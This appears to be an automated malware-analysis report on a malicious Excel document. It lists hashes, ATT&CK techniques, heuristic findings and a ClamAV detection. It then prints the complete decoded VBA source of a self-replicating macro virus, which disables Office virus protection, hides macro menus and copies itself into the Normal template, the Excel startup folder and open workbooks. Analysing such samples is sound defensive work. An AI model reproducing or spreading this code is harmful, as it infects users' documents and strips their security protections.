Office (OLE) malware analysis — malicious · 7218cc9db53af72b

MALICIOUS

Office (OLE)

26.0 KB Created: 2004-02-22 18:44:27 Authoring application: Microsoft Excel First seen: 2015-09-29

MD5: 9129717a4ca9b84eea93aad94bfaac30 SHA-1: 70c2c62c63f851bd1c2c78a38670ce0def0b090c SHA-256: 7218cc9db53af72b13c20961c3088eff471e2f672237339dc40ea89507fd2ca9

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1070.004 File Deletion

The sample is a malicious Excel document containing VBA macros. The macros attempt to disable macro virus protection and replicate their code into other documents and the Excel startup path ('Book1.'). This behavior suggests an intent to spread and persist across the user's system, potentially as a downloader or part of a larger infection chain. The ClamAV detection of 'Win.Trojan.wmvg-1' further supports its malicious nature.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
        .VirusProtection = False
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set xl = CreateObject("Excel.Application")
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5991 bytes
SHA-256: `adf0ac5021ca1bf4ead7246107104a6917ed104ef7d796b7d2dd126de44e2e90`
Detection ClamAV: Win.Trojan.wmvg-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'kr1tz do this.....! Private Sub InfectDoc() On Error Resume Next Dim InstMast, SaveVict As Boolean InstMast = False If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") = "" Else CommandBars("Tools").Controls("Macro").Enabled = False With Options .VirusProtection = False .SaveNormalPrompt = False .ConfirmConversions = False End With End If If MacroContainer = NormalTemplate Then Set Mast = NormalTemplate.VBProject.VBComponents.Item(1) Set Vict = ActiveDocument CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines) ElseIf MacroContainer = ActiveDocument Then Set Mast = ActiveDocument.VBProject.VBComponents.Item(1) Set Vict = NormalTemplate CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines) End If DisVirProt Set xl = CreateObject("Excel.Application") If UCase(Dir(xl.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then Set Mastxl = xl.Workbooks.Add Mastxl.VBProject.VBComponents("ThisWorkbook").CodeModule.AddFromString CodeMast Mastxl.SaveAs Filename:=xl.Application.StartupPath + "\Book1." End If xl.Quit SaveVict = False If UCase(Mid(Vict.FullName, 1, 3)) <> UCase("DOC") Then SaveVict = True For Each fVict In Vict.VBProject.VBComponents If (fVict.Type <> 100) Then Application.OrganizerDelete Vict.FullName, fVict.Name, wdOrganizerObjectProjectItems ElseIf (fVict.Type = 100) And (fVict.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then fVict.CodeModule.DeleteLines 1, fVict.CodeModule.CountOfLines InstMast = True End If Next fVict Set Vict = Vict.VBProject.VBComponents.Item(1) If InstMast = True Then Vict.CodeModule.AddFromString CodeMast If NormalTemplate.Saved = True Then NormalTemplate.Save If SaveVict = True Then ActiveDocument.Save End If End Sub Private Sub Workbook_Deactivate() On Error Resume Next Set Vict = ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule Set Code = ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule CodeMast = Code.Lines(1, Code.CountOfLines) CommandBars("Tools").Controls("Macro").Enabled = False If UCase(Dir(Application.StartupPath & "\Book1.")) <> "BOOK1" Then Set xlApp = CreateObject("Excel.Application") Set BookMast = xlApp.Workbooks.Add BookMast.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, CodeMast.Lines(1, CodeMast.CountOfLines) BookMast.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False xlApp.Quit End If Set wd = CreateObject("Word.Application") wd.Options.SaveNormalPrompt = False For i = 1 To wd.NormalTemplate.VBProject.VBComponents.Count Set wdNT = wd.NormalTemplate.VBProject.VBComponents(i) If wdNT.Type <> 100 Then wd.Application.OrganizerDelete wd.NormalTemplate.FullName, wd.NormalTemplate.VBProject.VBComponents(i).Name, wd.wdOrganizerObjectProjectItems ElseIf (wdNT.Type = 100) And (wdNT.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then If wdNT.CodeModule.CountOfLines <> 0 Then wdNT.CodeModule.DeleteLines 1, wdNT.CodeModule.CountOfLines End If wd.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString CodeMast End If Next i Set wd = Nothing wd.Quit For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count If ActiveWorkbook.VBProject.VBComponents(i).CodeModule.Find("'Code", 1, 1, 1000, 1000) = False Then ActiveWorkbook.VBProject.VBComponents(i).CodeModule.DeleteLines 1, ActiveWorkbook.VBProject.VBComponents(i).CodeModule.CountOfLines Addi = ActiveWorkbook.VBProject.VBComponents(i).Name If ActiveWorkbook.VBProject.VBComponents(i).Type = 100 Then If UCase(Mid((ActiveWorkbook.VBProject.VBComponents(i).Name), 1, 5)) <> "SHEET" Then ActiveWorkbook.VBProject.VBComponents(i).CodeModule.AddFromString CodeMast End If End If End If If Mid((ActiveWorkbook.Name), 1, 4) <> "Book" Then If ActiveWorkbook.Saved = False Then ActiveWorkbook.Save End If Next i End Sub Private Sub DisVirProt() System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = "" System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "" End Sub Private Sub Document_Open() InfectDoc End Sub Private Sub Document_Close() InfectDoc End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.